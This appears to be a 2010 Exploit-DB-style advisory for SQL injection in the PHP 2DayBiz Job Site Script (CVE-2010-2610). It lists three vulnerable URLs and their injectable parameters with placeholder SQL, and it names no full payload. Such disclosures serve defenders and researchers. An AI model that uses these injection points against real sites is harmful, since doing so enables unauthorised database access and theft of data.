[] NeoSense

2DayBiz Job Site Script - SQL Injection

Author: Sangteamtham
type: webapps
platform: php
port: 
date_added: 2010-06-24 
date_updated: 2010-06-24 
verified: 1 
codes: OSVDB-65716;OSVDB-65715;OSVDB-65714;CVE-2010-2610 
tags: 
aliases:  
screenshot_url:  
application_url: 

$-------------------------------------------------------------------------------------------------------------------
$ 2daybiz Job site Script SQL injection
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download :http://www.2daybiz.com/realestate_portalscript.html
$ Date :06/24/2010
$
$******************************************************************************************
$Exploit:
$
$ http://server/view_current_job.php?jid=[id number][SQL]
$ http://server/show_search_more.php?job_iid=[id number][SQL]
$ http://server/show_search_result.php?left_cat=[id number][SQL]
$
$******************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for
more security
$
$
$--------------------------------------------------------------------------------------------------------------------